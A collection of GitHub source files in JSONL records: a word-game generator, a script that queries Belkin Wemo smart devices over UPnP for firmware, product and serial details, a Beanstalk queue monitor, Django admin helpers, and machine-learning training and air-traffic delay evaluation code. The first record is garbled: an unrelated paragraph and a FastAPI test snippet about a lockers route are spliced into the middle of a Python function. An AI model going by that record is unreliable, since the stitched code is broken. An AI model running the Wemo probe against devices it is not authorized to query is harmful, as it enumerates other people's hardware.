+{"seq_id":"73906160488","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nimport random\n\nfrom .constants import (NUM_BLACK_WORDS, NUM_BLUE_WORDS, NUM_RED_WORDS,\n                        NUM_WHITE_WORDS, NUM_WORDS)\nfrom ..models import TeamWord\n\n\ndef gen_word_list(num_words=NUM_WORDS):\n    \"\"\"Generate a list of words to be used by the game.\n\n    Currently a placeholder.\n\n    :param int num_words: The total number of words to return\n    :return: Words to use.\n    :rtype: list[str]\n    \"\"\"\n    return [str(x) for x in range(num_words)]\n\n\ndef gen_team_list(num_red_words=NUM_RED_WORDS, num_blue_words=NUM_BLUE_WORDS,\n                  num_white_words = NUM_WHITE_WORDS, num_black_words=NUM_BLACK_WORDS,\n                  random=random.Random()):\n    \"\"\"Generate a list which maps words to teams.\n\n    :param int num_red_words: The number of words for the red team\n    :param int num_blue_words: The number of words for the blue team\n    :param int num_white_words: The number of words for the white team\n    :param int num_black_words: The number of words for the black team\n    :return: A list of teams\n    :rtype: list[TeamWord]\n    \"\"\"\n    output = []\n    
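The /lockers route above returns a mixed list (available lockers verbatim, occupied ones with a computed timeLeft). A hedged way to exercise it in isolation with FastAPI's TestClient, assuming `config.database.mongo_connection` is importable in the test environment (e.g. stubbed) so the module loads:

```python
# Sketch of driving the lockers router with TestClient (assumed test setup).
from fastapi import FastAPI
from fastapi.testclient import TestClient

app = FastAPI()
app.include_router(router)

client = TestClient(app)
resp = client.get("/lockers/")
assert resp.status_code == 200  # entries carry locker_id/available, plus timeLeft when occupied
```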
output.extend([TeamWord.RED for _ in range(num_red_words)])\n output.extend([TeamWord.BLUE for _ in range(num_blue_words)])\n output.extend([TeamWord.WHITE for _ in range(num_white_words)])\n output.extend([TeamWord.BLACK for _ in range(num_black_words)])\n\n random.shuffle(output)\n return output\n","repo_name":"khwilson/codewords","sub_path":"codewords/game_logic/word_gen.py","file_name":"word_gen.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35224983793","text":"import requests\nimport xml.etree.ElementTree as etree\n\nTIMEOUT = 5\n\n\ndef main():\n # put your target device list here:\n target_list = (\"192.168.1.1\",\n \"192.168.1.2\"\n )\n\n device_info = \"/upnp/control/deviceinfo1\"\n manuf_info = \"/upnp/control/manufacture1\"\n event_info = \"/upnp/control/basicevent1\"\n meta_info = \"/upnp/control/metainfo1\"\n\n # Some useful things\n #setup_xml=\"setup.xml\"\n #device_xml=\"deviceinfoservice.xml\"\n #event_xml=\"eventservice.xml\"\n\n #action1=\"GetDeviceInformation\"\n #action2=\"GetInformation\"\n\n wemo_port = 49153\n\n verb_device = \"GetInformation\" #GetInformation, GetDeviceInformation, GetRouterInformation can't get this one to work.\n verb_event = \"GetFriendlyName\"\n verb_meta = \"GetMetaInfo\" #GetMetaInfo, GetExtMetaInfo isn't really useful\n\n data_dev = \"\"\n data_manuf = \"\"\n data_event = \"\"\n data_meta = \"\"\n\n headers_dev = {\n \"Content-Type\" : \"text/xml; charset=utf-8\",\n \"SOAPACTION\" : \"\\\"urn:Belkin:service:deviceinfo:1#\"+verb_device+\"\\\"\",\n \"Connection\" : \"keep-alive\",\n \"Content-Length\" : str(len(data_dev))\n }\n headers_manuf = {\n \"Content-Type\" : \"text/xml; charset=utf-8\",\n \"SOAPACTION\" : \"\\\"urn:Belkin:service:manufacture:1#GetManufactureData\\\"\",\n \"Connection\" : \"keep-alive\",\n \"Content-Length\" : str(len(data_dev))\n }\n headers_event = {\n \"Content-Type\" : \"text/xml; charset=utf-8\",\n \"SOAPACTION\" : \"\\\"urn:Belkin:service:basicevent:1#\"+verb_event+\"\\\"\",\n \"Connection\" : \"keep-alive\",\n \"Content-Length\" : str(len(data_dev))\n }\n headers_meta = {\n \"Content-Type\": \"text/xml; charset=utf-8\",\n \"SOAPACTION\": \"\\\"urn:Belkin:service:metainfo:1#\" + verb_meta + \"\\\"\",\n \"Connection\": \"keep-alive\",\n \"Content-Length\": str(len(data_dev))\n }\n # GetFriendlyName just returns friendly name\n #GetSmartDevInfo was a dud. GetHomeInfo returns some base64 encoded blob. 
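`gen_team_list` above takes the Random instance as a parameter, so a seeded draw is reproducible; note the `random=random.Random()` default is a single shared instance, a common Python default-argument gotcha. A minimal usage sketch:

```python
# Reproducible board assembly from the two generators above.
import random as _random

words = gen_word_list()
teams = gen_team_list(random=_random.Random(42))  # seeded -> deterministic shuffle
board = list(zip(words, teams))                   # (word, TeamWord) pairs
```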
maybe creds\n\n for i in target_list:\n try:\n r_dev = requests.post(\"http://{}:{}{}\".format(i, wemo_port, device_info), headers=headers_dev, data=data_dev,\n stream=True, timeout=TIMEOUT)\n #r_man = requests.post(\"http://{}:{}{}\".format(i, wemo_port, manuf_info), headers=headers_manuf,\n # data=data_manuf, stream=True, timeout=TIMEOUT)\n #r_event = requests.post(\"http://{}:{}{}\".format(i, wemo_port, event_info), headers=headers_event,\n # data=data_event, stream=True, timeout=TIMEOUT)\n r_meta = requests.post(\"http://{}:{}{}\".format(i, wemo_port, meta_info), headers=headers_meta,\n data=data_meta, stream=True, timeout=TIMEOUT)\n\n except requests.exceptions.Timeout:\n continue\n except requests.exceptions.ConnectionError:\n continue\n parse_wemo_xml_dev(r_dev, i, verb_device)\n #parse_wemo_xml_manuf(r_man, i)\n #parse_wemo_xml_event(r_event, i)\n parse_wemo_xml_meta(r_meta, i, verb_meta)\n\ndef parse_wemo_xml_dev(resp, ip, verb):\n tree = etree.parse(resp.raw)\n root = tree.getroot()\n if root is not None:\n info = root.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')\n if info is None:\n return\n if verb == \"GetInformation\":\n info = info.find('{urn:Belkin:service:deviceinfo:1}GetInformationResponse')\n if info is None:\n return\n info = info.find('Information')\n tree2 = etree.fromstring(info.text)\n\n fw = tree2.find('DeviceInformation').find('firmwareVersion').text\n product = tree2.find('DeviceInformation').find('productName').text\n full = tree2.find('DeviceInformation').find('FriendlyName').text\n print(\"[*] found a {} of type {} at ?.?.{} with version {}\".format(full, product, \".\".join(ip.split(\".\")[-2:]), fw))\n\ndef parse_wemo_xml_manuf(resp, ip):\n tree = etree.parse(resp.raw)\n root = tree.getroot()\n if root is not None:\n info = root.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')\n if info is None:\n return\n info = info.find('{urn:Belkin:service:manufacture:1}GetManufactureDataResponse')\n if info is None:\n return\n #TODO: parse this out\n info = info.find('Information')\n if info is None:\n return\n tree2 = etree.fromstring(info.text)\n\n fw = tree2.find('DeviceInformation').find('firmwareVersion').text\n product = tree2.find('DeviceInformation').find('productName').text\n full = tree2.find('DeviceInformation').find('FriendlyName').text\n print(\"[*] found a {} of type {} at ?.?.{} with version {}\".format(full, product, \".\".join(ip.split(\".\")[-2:]), fw))\n\ndef parse_wemo_xml_event(resp, ip):\n tree = etree.parse(resp.raw)\n root = tree.getroot()\n if root is not None:\n info = root.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')\n if info is None:\n return\n info = info.find('{urn:Belkin:service:deviceinfo:1}GetInformationResponse')\n if info is None:\n return\n info = info.find('Information')\n tree2 = etree.fromstring(info.text)\n\n fw = tree2.find('DeviceInformation').find('firmwareVersion').text\n product = tree2.find('DeviceInformation').find('productName').text\n full = tree2.find('DeviceInformation').find('FriendlyName').text\n print(\"[*] found a {} of type {} at ?.?.{} with version {}\".format(full, product, \".\".join(ip.split(\".\")[-2:]), fw))\n\ndef parse_wemo_xml_meta(resp, ip, verb):\n tree = etree.parse(resp.raw)\n root = tree.getroot()\n if root is not None:\n info = root.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')\n if info is None:\n return\n\n if verb == \"GetMetaInfo\":\n info = info.find('{urn:Belkin:service:metainfo:1}GetMetaInfoResponse')\n if info is None:\n return\n info = 
info.find('MetaInfo')\n meta = info.text.split('|')\n serial = meta[1]\n cat = meta[2]\n fw = meta[3]\n name = meta[4]\n type = meta[5]\n\n print(\"[*] found a {} category {} at ?.?.{} named with version {} and serial {}\".format(cat, type, \".\".join(ip.split(\".\")[-2:]), name, fw, serial))\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"bensmith83/we_go","sub_path":"we_go.py","file_name":"we_go.py","file_ext":"py","file_size_in_byte":7667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31302909931","text":"from controller.controller import Controller\nfrom pystalk import BeanstalkClient\nimport re\n\nclass from_beanstalk(Controller):\n\n final = {}\n\n def __init__(self, **kwargs):\n Controller.__init__(self,**kwargs)\n self.frombeanstalk()\n\n def frombeanstalk(self):\n try:\n result = []\n a = 0\n result.append(\"\\n--\\t*Beanstalk*\\t--\")\n while True:\n tw = re.compile('sc_twitter_')\n fb = re.compile('sc_fb_')\n ig = re.compile('sc_ig_')\n yt = re.compile('sc_youtube_')\n if a == 1:\n tube_list_fb = []\n tube_list_ig = []\n tube_list_yt = []\n client = BeanstalkClient(self.config.get('ip_beanstalk','ip_ph'),self.config.get('ip_beanstalk','port_ph'))\n list_tube = client.list_tubes()\n for b in range(list_tube.__len__()):\n if fb.findall(list_tube[b]): tube_list_fb.append(list_tube[b])\n if ig.findall(list_tube[b]): tube_list_ig.append(list_tube[b])\n if yt.findall(list_tube[b]): tube_list_yt.append(list_tube[b])\n tube_list = tube_list_fb + tube_list_ig + tube_list_yt\n for c in tube_list:\n data = client.stats_tube(c)\n if data['current-jobs-urgent'] >= 3000 or data['current-jobs-ready'] >= 3000:\n res = \"\\n*{0}*\\nworker : {1}\\njobs-urgent : {2}\\njobs-ready : {3}\\njobs-buried : {4}\\njobs-reserved: {5}\" \\\n .format(data['name'], data['current-watching'], data['current-jobs-urgent'],\n data['current-jobs-ready'], data['current-jobs-buried'], data['current-jobs-reserved'])\n result.append(res)\n else: continue\n elif a == 0 :\n tube_list = []\n client = BeanstalkClient(self.config.get('ip_beanstalk','ip_bintaro'),self.config.get('ip_beanstalk','port_bintaro'))\n list_tube = client.list_tubes()\n for b in range(list_tube.__len__()):\n if tw.findall(list_tube[b]): tube_list.append(list_tube[b])\n for c in tube_list:\n data = client.stats_tube(c)\n if data['current-jobs-urgent'] >= 3000 or data['current-jobs-ready'] >= 3000:\n res = \"\\n*{0}*\\nworker : {1}\\njobs-urgent : {2}\\njobs-ready : {3}\\njobs-buried : {4}\\njobs-reserved: {5}\" \\\n .format(data['name'], data['current-watching'], data['current-jobs-urgent'],\n data['current-jobs-ready'], data['current-jobs-buried'], data['current-jobs-reserved'])\n result.append(res)\n else: continue\n else: break\n a+=1\n if result.__len__() <= 1: result.append(\"\\nBeanstalk Safe.\")\n print (\"\\n\".join(result))\n self.final['beanstalk'] = result\n # return result\n except ValueError as e: self.final['beanstalk'] = e\n\nif __name__ == '__main__':\n from_beanstalk().final.get('beanstalk')","repo_name":"Enzila/SC_Alertbot","sub_path":"get/get_from_beanstalk.py","file_name":"get_from_beanstalk.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"43898286233","text":"from .models import *\nfrom django.utils.html import format_html\nfrom django.conf import settings\n\ndef superuser_fields(self, request, obj=None, only_superuser_fieldslist=[]): #for maiking 
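The monitor above polls beanstalkd tube stats over pystalk and reports tubes whose ready/urgent job counts cross a threshold; stripped to its core, the polling loop is just this (host and port are placeholders):

```python
# Core of the tube-stats poll used by from_beanstalk above.
from pystalk import BeanstalkClient

client = BeanstalkClient("127.0.0.1", 11300)  # placeholder host/port
for tube in client.list_tubes():
    stats = client.stats_tube(tube)
    print(tube, stats["current-jobs-ready"], stats["current-jobs-urgent"])
```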
all fields read only for non superuser staff accounts\n if request.user.is_staff:\n if request.user.is_superuser:\n return only_superuser_fieldslist\n else:\n return [f.name for f in self.model._meta.fields]\n\n\ndef seeVideoFile(self, obj): #for showing the uploaded video link in the list of model instances\n try:\n if obj.videoFile:\n temp = '<a href=\"%s%s\">%s</a>' % (settings.MEDIA_URL,obj.videoFile, \"Video\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\ndef seeArticleFile(self, obj): #for showing the uploaded article link in the list of model instances\n try:\n if obj.articleFile:\n temp = '<a href=\"%s%s\">%s</a>' % (settings.MEDIA_URL,obj.articleFile, \"Article\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\ndef seeArticleLink(self, obj): #for showing the external article link in the list of model instances\n try:\n if obj.articleFileLink:\n temp = '<a href=\"%s\">%s</a>' % (obj.articleFileLink, \"Link\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\ndef seeAudioVideoFile(self, obj): #for showing the uploaded audio/video link in the list of model instances\n try:\n if obj.audioVideoFile:\n temp = '<a href=\"%s%s\">%s</a>' % (settings.MEDIA_URL,obj.audioVideoFile, \"Audio/Video\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\ndef seeVideoLink(self, obj): #for showing the external video link in the list of model instances\n try:\n if obj.videoFileLink:\n temp = '<a href=\"%s\">%s</a>' % (obj.videoFileLink, \"Link\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n\n\ndef seeAudioVideoLink(self, obj): #for showing the external audio/video link in the list of model instances\n try:\n if obj.audioVideoFileLink:\n temp = '<a href=\"%s\">%s</a>' % (obj.audioVideoFileLink, \"Link\")\n else:\n temp = '-'\n except:\n temp = '-'\n return format_html(temp)\n","repo_name":"nivedkrishnans/genesis","sub_path":"registration/adminResources.py","file_name":"adminResources.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36471432957","text":"import numpy as np\nimport pandas as pd\nimport pickle\n\nfrom sklearn.linear_model import LinearRegression\n\nData = pd.read_csv('DataPart03.csv')\n\nX = Data.drop('Sell Price($)', axis=1)\nX=pd.get_dummies(X)\nprint(X)\nX = np.array(X)\n\nY = Data['Sell Price($)']\nY = np.array(Y)\n\nModelPredict = LinearRegression().fit(X, Y)\n\n\nOutput = 'OutputP.sav'\npickle.dump(ModelPredict, open(Output, 'wb'))\n \nLoadModel = pickle.load(open(Output, 'rb'))\nResult = LoadModel.predict([[55000,5,1,0,0]])\nprint(Result)\n\n# Pickle\n# Good for small models with few parameters.\n# Allows saving the model in very little time.","repo_name":"amihos99/goalearn_task_0","sub_path":"CodePart03P.py","file_name":"CodePart03P.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1395831623","text":"import torch.utils.data as data\nimport lightning as L\nfrom lightning.pytorch.callbacks import LearningRateMonitor, ModelCheckpoint, ModelPruning\n\nfrom typing import Any, Dict, Optional, Union\nimport os\nfrom copy import copy\nfrom pathlib import Path\nPRJ_ROOT = Path(__file__).parent.parent.parent.resolve()\n\ndef train(\n model: L.LightningModule,\n dataset: 
data.Dataset,\n compress_params: Dict[str, Any] = dict(\n parameters_to_prune=None,\n prune_ratio=0.4,\n prune_at_epochs=[0.],\n ),\n trainer_params: Dict[str, Any] = dict(\n default_root_dir=os.path.join(PRJ_ROOT, \"configs\", \"nerv\"),\n max_epochs=150,\n log_every_n_steps=15,\n check_val_every_n_epoch=50\n ),\n loader_params: Dict[str, Any] = dict(\n batch_size=1,\n num_workers=2,\n pin_memory=True,\n drop_last=False,\n )\n): \n prune_at_epochs = sorted([int(i * trainer_params[\"max_epochs\"]) for i in compress_params[\"prune_at_epochs\"]])\n def compute_amount(epoch):\n if len(prune_at_epochs) == 1:\n if epoch == prune_at_epochs[0]:\n return compress_params[\"prune_ratio\"]\n return 0\n base_prune_ratio = compress_params[\"prune_ratio\"] ** (1 / len(prune_at_epochs))\n for i in range(len(prune_at_epochs)-1):\n if prune_at_epochs[i] <= epoch < prune_at_epochs[i+1]:\n return base_prune_ratio ** (i+2)\n return 0\n \n def prune_when(epoch):\n if epoch in prune_at_epochs:\n return True\n return False\n\n trainer = L.Trainer(\n accelerator=\"auto\",\n devices=1,\n callbacks=[\n ModelCheckpoint(mode=\"max\", monitor=\"val_psnr\"),\n LearningRateMonitor(\"epoch\"),\n ModelPruning(\n parameters_to_prune=compress_params[\"parameters_to_prune\"],\n pruning_fn=\"l1_unstructured\",\n amount=compute_amount,\n use_global_unstructured=True,\n apply_pruning=prune_when,\n )\n ],\n **trainer_params,\n )\n trainer.logger._log_graph = False # if True, we plot the computation graph in tensorboard\n trainer.logger._default_hp_metric = None # optional logging argument that we don't need\n\n # build data loaders\n train_loader = data.DataLoader(dataset, shuffle=True, **loader_params)\n val_loader = data.DataLoader(dataset, shuffle=False, **loader_params)\n\n # train the model\n L.seed_everything(42)\n trainer.fit(model, train_loader, val_loader) \n\n # load the best checkpoint\n return trainer.checkpoint_callback.best_model_path\n\ndef test(\n model: L.LightningModule,\n dataset: data.Dataset,\n weights: str,\n trainer_params: Dict[str, Any] = dict(\n default_root_dir=os.path.join(PRJ_ROOT, \"configs\", \"nerv\"),\n max_epochs=1,\n log_every_n_steps=1,\n ),\n loader_params: Dict[str, Any] = dict(\n batch_size=1,\n shuffle=False,\n num_workers=2,\n pin_memory=True,\n drop_last=False,\n )\n):\n trainer = L.Trainer(\n accelerator=\"auto\",\n devices=1,\n **trainer_params,\n )\n trainer.logger._log_graph = False # if True, we plot the computation graph in tensorboard\n trainer.logger._default_hp_metric = None # optional logging argument that we don't need\n\n val_loader = data.DataLoader(dataset, **loader_params)\n \n model = model.load_from_checkpoint(weights)\n test_result = trainer.test(model, dataloaders=val_loader, verbose=False)\n return test_result","repo_name":"minhngt62/vtl-video-compression","sub_path":"video_compression/setup/train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24584637617","text":"import pandas as pd\nimport numpy as np\nimport datetime as dt\nfrom sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error\nimport matplotlib.pyplot as plt\nimport os\nimport logging\nimport json\n\n# data directory containing the raw NMIR files\nNMIR_DATA_DIR = \"data/NMIR\"\n\n# savepath for training job outputs\nOUTPUT_DIR = \"output\"\nif not os.path.exists(OUTPUT_DIR):\n os.makedirs(OUTPUT_DIR)\n\n# Import the database for AIRACs\nAIRAC_DF = 
pd.read_csv('data/AIRAC_dates.csv')\nAIRAC_DF['start_date'] = pd.to_datetime(AIRAC_DF['start_date'])\nAIRAC_DF['end_date'] = pd.to_datetime(AIRAC_DF['end_date'])\n\n# Import the delay categorization for evaluation\nDELAY_CATG_DF = pd.read_csv('data/delay_categorization.csv')\n\n# Define all possible Regulation types\nREGULATION_TYPES = ['C - ATC Capacity', 'W - Weather', 'S - ATC Staffing',\n 'G - Aerodrome Capacity', 'I - ATC Ind Action',\n 'M - Airspace Management', 'O - Other', 'P - Special Event',\n 'T - ATC Equipment', 'V - Environmental Issues',\n 'E - Aerodrome Services', 'R - ATC Routeings',\n 'A - Accident/Incident', 'N - Ind Action non-ATC']\n\ndef format_raw_NMIR_df(df):\n '''Function to format the raw NMIR dataframe and keep only the important columns.\n \n Args:\n df (DataFrame): raw NMIR dataframe\n \n Returns:\n df (DataFrame): formatted NMIR dataframe\n '''\n df['ACC'] = df['TVS Id'].str[0:4] #First four letters of 'TVS Id' is considered as ACC \n df['Regulation Start Time'] = pd.to_datetime(df['Regulation Start Time'])\n df['Date'] = df['Regulation Start Time'].dt.date\n df['Datetime'] = pd.to_datetime(df['Date'])\n df['Regulation Activation Date'] = pd.to_datetime(df['Regulation Activation Date'])\n df = df.loc[df['ATFM Delay (min)']>0].reset_index(drop=True)\n\n columns_to_retain = ['ACC', 'Date', 'Datetime', 'Regulation Start Time',\n 'Regulation End Date', 'Regulation Activation Date',\n 'Regulation Duration (min)', 'Regulation Cancel Status',\n 'Regulation Cancel Date', 'Regulation Reason Name',\n 'ATFM Delay (min)', 'MP Delayed Traffic']\n df = df[columns_to_retain] \n return df\n\ndef get_airac(date):\n '''Function to get the airac cycle (1 to 13) for any date.\n \n Args:\n date (datetime object): the date for which the AIRAC cycle is required.\n \n Returns:\n airac (int): AIRAC (1 to 13) for the date.\n '''\n airac = AIRAC_DF.loc[(AIRAC_DF['start_date']<=date) & (AIRAC_DF['end_date']>date)]['AIRAC_cycle'].iloc[0]\n return airac\n\ndef get_regulation_count(day_df):\n '''Function to count the number of regulations for each type of regulation for a day.\n \n Args:\n day_df (pandas df): The dataframe from which the counts are to be made.\n \n Returns:\n reg_counts_list (list): count of each type of regulations for a day as a list\n '''\n reg_counts_list = []\n for rt in REGULATION_TYPES:\n try:\n reg_count = day_df['Regulation Reason Name'].value_counts()[rt]\n except KeyError:\n reg_count = 0\n reg_counts_list.append(reg_count)\n return reg_counts_list\n\ndef build_basic_features(day_df):\n '''Function to build a feature list for a day from the NMIR dataframe list of regulations for a day\n \n Args:\n day_df (pandas df): the dataframe containing the list of regulations (cut off by activation time ex: 6AM) for a day.\n \n Returns:\n features (list): the features for a day. 
\n '''\n datetime_0hrs = day_df.iloc[0]['Datetime']\n count_reg_pub = day_df.shape[0]\n avg_reg_dur_pub = day_df['Regulation Duration (min)'].mean()\n d_op_activation_counts = day_df.loc[day_df['Regulation Activation Date']>datetime_0hrs].shape[0]\n count_num_ACC_pub = len(day_df['ACC'].unique().tolist())\n weekday = day_df.loc[0]['Datetime'].dayofweek\n airac = get_airac(day_df.loc[0]['Datetime'])\n reg_counts_list = get_regulation_count(day_df)\n features = [count_reg_pub, avg_reg_dur_pub, d_op_activation_counts, count_num_ACC_pub, weekday, airac] + reg_counts_list\n return features\n\ndef build_labels(day_df):\n '''Function to build the labels for a day from the NMIR dataframe list of regulations for a day.\n \n Args:\n day_df (pandas df): The dataframe containing the list of regulations (cut off by day_end_hrs ex: 24 representing end of the day) for a day.\n \n Returns:\n labels (list): the labels ['ATFM Delay (min)', 'MP Delayed Traffic'] for a day.\n '''\n atfm_delay = day_df['ATFM Delay (min)'].sum()\n mp_delayed_traffic = day_df['MP Delayed Traffic'].sum()\n labels = [atfm_delay, mp_delayed_traffic]\n return labels\n\ndef transform_to_daywise_basic(raw_df, pub_cut_off_hrs=6, day_end_hrs=24, encode=False):\n '''Function to transform raw NMIR dataframe into a daywise dataframe with features and labels.\n \n Args:\n raw_df (pandas df): The raw NMIR dataframe.\n \n pub_cut_off_hrs (int): This number represents the hour (0 to 24) which is used to separate a day's\n list of regulations as a snapshot to build the features. This is based on the 'activation time' column.\n \n day_end_hrs (int): This number represents the target time hour (0 to 24) up to which delays are summed as labels for the day.\n \n Returns:\n daywise_df: A daywise dataframe with features and labels\n '''\n raw_df = raw_df.reset_index(drop=True)\n raw_df = format_raw_NMIR_df(raw_df)\n dates = raw_df.groupby(by ='Date',as_index=False).sum()['Date'].tolist() # get a list of all available dates in the df\n \n daywise_rowdata_list = []\n for d in dates:\n day_df = raw_df.loc[raw_df['Date']==d].reset_index(drop=True)\n day_begin_time = pd.to_datetime(d) # convert date to datetime to get 00:00 hrs time-stamp\n reg_cut_off_time = day_begin_time + dt.timedelta(hours=pub_cut_off_hrs)\n day_end_time = day_begin_time + dt.timedelta(hours=day_end_hrs)\n \n # select only regulations activated from the start of the day until the cutoff time\n day_df = day_df.loc[day_df['Regulation Activation Date']<=reg_cut_off_time].reset_index(drop=True)\n \n # build features from the filtered daily regulations list\n day_features = build_basic_features(day_df)\n day_labels = build_labels(day_df.loc[day_df['Regulation Start Time']<=day_end_time])\n daywise_rowdata_list.append([d] + day_features + day_labels)\n header = ['Date', 'CountRegPub', 'AvgRegDurPub', 'DopActivationCounts','CountNumACCPub',\n 'WeekDay', 'AIRAC'] + REGULATION_TYPES + ['ATFM Delay (min)', 'MP Delayed Traffic']\n return pd.DataFrame(daywise_rowdata_list, columns=header)\n \ndef get_MAPE(y_act, y_pred):\n '''Function to calculate the Mean Absolute Percentage Error (MAPE).\n MAPE = (|y_act-y_pred| * 100) / y_act\n \n Args:\n y_act (1D numpy array): actual values.\n \n y_pred (1D numpy array): predicted values.\n \n Returns:\n MAPE (float): Mean Absolute Percentage Error\n '''\n abs_per_err = np.abs(y_pred-y_act) *100 / y_act \n mape = abs_per_err.mean()\n return mape\n\ndef print_metrics(y_act_train, y_pred_train, y_act_test, y_pred_test, target):\n print('-----' + 'Results: ' + target + 
'-----')\n print('------Training Metrics------')\n print('R_squared:', r2_score(y_act_train, y_pred_train))\n print('Error % (abs):', get_MAPE(y_act_train, y_pred_train))\n print('MAE:', mean_absolute_error(y_act_train, y_pred_train))\n print('RMSE:', np.sqrt(mean_squared_error(y_act_train, y_pred_train)))\n print('------Testing Metrics------')\n print('R_squared:', r2_score(y_act_test, y_pred_test))\n print('Error % (abs):', get_MAPE(y_act_test, y_pred_test))\n print('MAE:', mean_absolute_error(y_act_test, y_pred_test))\n print('RMSE:', np.sqrt(mean_squared_error(y_act_test, y_pred_test)))\n\ndef save_metrics_detailed(y_act_train, y_pred_train, y_act_test, y_pred_test, target, job_dir):\n columns = ['category', 'train_days', 'test_days', 'train_MAPE', 'test_MAPE', 'train_R2', 'test_R2', 'train_RMSE', 'test_RMSE']\n data = []\n categories_list = DELAY_CATG_DF['category'].to_list()\n for category in categories_list:\n if target==\"delay\":\n lower_bound = DELAY_CATG_DF.loc[DELAY_CATG_DF['category']==category]['delay_low'].item()\n upper_bound = DELAY_CATG_DF.loc[DELAY_CATG_DF['category']==category]['delay_high'].item()\n else:\n lower_bound = DELAY_CATG_DF.loc[DELAY_CATG_DF['category']==category]['delayed_traffic_low'].item()\n upper_bound = DELAY_CATG_DF.loc[DELAY_CATG_DF['category']==category]['delayed_traffic_high'].item()\n if np.isnan(upper_bound):\n upper_bound = np.inf\n y_act_train_catg = y_act_train[(y_act_train >= lower_bound) & (y_act_train < upper_bound)]\n y_pred_train_catg = y_pred_train[(y_act_train >= lower_bound) & (y_act_train < upper_bound)]\n y_act_test_catg = y_act_test[(y_act_test >= lower_bound) & (y_act_test < upper_bound)]\n y_pred_test_catg = y_pred_test[(y_act_test >= lower_bound) & (y_act_test < upper_bound)]\n train_days = y_act_train_catg.shape[0]\n test_days = y_act_test_catg.shape[0]\n train_MAPE = get_MAPE(y_act_train_catg, y_pred_train_catg)\n test_MAPE = get_MAPE(y_act_test_catg, y_pred_test_catg)\n train_R2 = r2_score(y_act_train_catg, y_pred_train_catg)\n test_R2 = r2_score(y_act_test_catg, y_pred_test_catg)\n train_RMSE = np.sqrt(mean_squared_error(y_act_train_catg, y_pred_train_catg))\n test_RMSE = np.sqrt(mean_squared_error(y_act_test_catg, y_pred_test_catg))\n data.append([category, train_days, test_days, round(train_MAPE, 2), round(test_MAPE, 2),\n round(train_R2, 2), round(test_R2, 2),\n round(train_RMSE, 2), round(test_RMSE, 2)])\n metrics_df = pd.DataFrame(data, columns=columns)\n metrics_df.to_csv(os.path.join(OUTPUT_DIR, job_dir, target + \"_\" + \"metrics.csv\"), index=False)\n\ndef save_line_plots(y_act_train, y_pred_train, y_act_test, y_pred_test, target, job_dir):\n fig, ax = plt.subplots(2, 1, sharex = False, figsize=(15,8))\n fig.subplots_adjust(hspace=.4)\n ax[0].plot(range(0, len(y_act_train), 1), y_act_train, range(0, len(y_act_train), 1), y_pred_train)\n ax[0].set_title('Training set results: ' + target)\n ax[0].legend(['Actual','Prediction'])\n ax[0].set_xlabel('days (unordered)')\n ax[1].plot(range(0, len(y_act_test), 1), y_act_test, range(0, len(y_act_test), 1), y_pred_test)\n ax[1].set_title('Testing set results: ' + target)\n ax[1].legend(['Actual','Prediction'])\n ax[1].set_xlabel('days (unordered)')\n if target == 'delay':\n ax[0].set_ylabel('delay (min)')\n ax[1].set_ylabel('delay (min)')\n else:\n ax[0].set_ylabel('delayed traffic (flights)')\n ax[1].set_ylabel('delayed traffic (flights)')\n plt.savefig(os.path.join(OUTPUT_DIR, job_dir, \"lineplot.png\"), bbox_inches='tight')\n\ndef save_scatter_plots(y_act_train, 
y_pred_train, y_act_test, y_pred_test, target, job_dir):\n fig, ax = plt.subplots(2, 1, sharex = True, figsize=(8,8))\n fig.subplots_adjust(hspace=.3)\n max_value = np.max(np.concatenate((y_act_train, y_pred_train, y_act_test, y_pred_test), axis=0))\n scatter_limit = int(max_value + 0.1 * max_value)\n ax[0].plot(range(0, scatter_limit, 1),range(0, scatter_limit, 1), color='red')\n ax[0].scatter(y_act_train, y_pred_train, alpha=0.5)\n ax[0].set_title('Training set results: ' + target)\n ax[0].legend(['Target','Prediction'])\n ax[0].set_xlabel('actual delay (min)')\n ax[1].plot(range(0, scatter_limit, 1),range(0, scatter_limit, 1), color='red')\n ax[1].scatter(y_act_test, y_pred_test, alpha=0.5)\n ax[1].set_title('Testing set results: ' + target)\n ax[1].legend(['Target','Prediction'])\n ax[1].set_xlabel('actual delay (min)')\n if target == 'delay':\n ax[0].set_ylabel('predicted delay (min)')\n ax[1].set_ylabel('predicted delay (min)')\n else:\n ax[0].set_ylabel('predicted delayed traffic (flights)')\n ax[1].set_ylabel('predicted delayed traffic (flights)')\n plt.savefig(os.path.join(OUTPUT_DIR, job_dir, \"scatterplot.png\"), bbox_inches='tight')\n\ndef save_predictions(y_act_train, y_pred_train, y_act_test, y_pred_test, target, job_dir):\n header = ['actual', 'prediction']\n y_act_train = np.array(y_act_train).reshape(-1,1)\n y_pred_train = np.array(y_pred_train).reshape(-1,1)\n y_act_test = np.array(y_act_test).reshape(-1,1)\n y_pred_test = np.array(y_pred_test).reshape(-1,1)\n train_result = pd.DataFrame(np.concatenate((y_act_train, y_pred_train), axis=1), columns = header)\n test_result = pd.DataFrame(np.concatenate((y_act_test, 